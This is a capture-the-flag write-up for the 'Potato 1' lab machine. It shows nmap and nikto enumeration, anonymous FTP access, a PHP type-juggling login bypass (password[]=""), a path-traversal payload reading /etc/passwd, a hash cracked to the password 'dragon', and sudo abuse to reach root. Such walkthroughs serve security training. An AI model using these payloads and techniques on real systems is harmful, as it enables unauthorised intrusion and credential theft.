Potato 1

Easy, Real life like

I have completed this in 3 steps.

1. Enumeration: Nmap helped to get in

2. Exploitation: Burp proxy and php vulnerability

3. Post exploitation: Abusing admin permission

So let's talk in detail.

1. Enumeration

1) At first, I need to know the target IP, so:

 netdiscover -i eth0 -r 10.0.0.0/16

and I got the IP: 10.0.2.39

2) As always I have started with all port scanning

nmap -p- -v -Pn 10.0.2.39

and I have got 3 ports open:

Discovered open port 22/tcp on 10.0.2.39
Discovered open port 80/tcp on 10.0.2.39
Discovered open port 2112/tcp on 10.0.2.39

3) Now digging deeper to those ports:

nmap -sV -O -p80,22,2112 -v -Pn 10.0.2.39

An unusual port running FTP:

PORT     STATE     SERVICE     VERSION
22/tcp     open         ssh      OpenSSH 8.2p1 Ubuntu
80/tcp     open         http     Apache httpd 2.4.41 ((Ubuntu))
2112/tcp   open         ftp       ProFTPD

4) As it has a web page, so I have started dirbuster to scan:

Running the scan

Scan result

5) Nikto scan also reveals similar info to dirbuster:

nikto -h http://10.0.2.39/

Scan report is:

+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.

6) Found /admin, /admin/index.php. These page are showing one login form.

7) Attempted to brute force or guess the password I have failed

8) Found logs.txt but nothing interesting found except - Admin has changed password.

9) After some failed attempt to brute force, I have focused on FTP. FTP login:

ftp -p 10.0.2.39 2112

I have found: - anonymous login allowed - found 2 interesting files

-rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg

downloaded those files:

 get index.php.bak

2. Exploitation

10) From index.php.bak, I can see the source code:

11) I have tried SQL injection but failed. After some research, I have found this article about - type juggling. It helps!

12) Successfully exploited this vulnerability. I have used - password[]=""

13) Result:

14) But I am facing access denied message:

15) Other pages don't have any interesting this except the Logs. I have intercepted all the request with Burp. And I have found an interesting entry in logs. This will probably lead to LFI.

16) I have tried file=../../../../../etc/passwd

17) got = webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6. Here I have used john the ripper and I have got:

1. user: webadmin

2. pass: dragon

18) Now login to ssh

ssh webadmin@10.0.2.39

and eventually I have found the user flag

3. Post Exploitation

19) Now I need root access. I have searched for another profile then webadmine's privilege

20) Here, webadmin cat execute /notes and anything after it. That's the key point! I have created a small shell and executed it.

21) Finally I have got root flag in /root/root.txt

bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA==

Hope this write up will help you. Any feedback is appreciated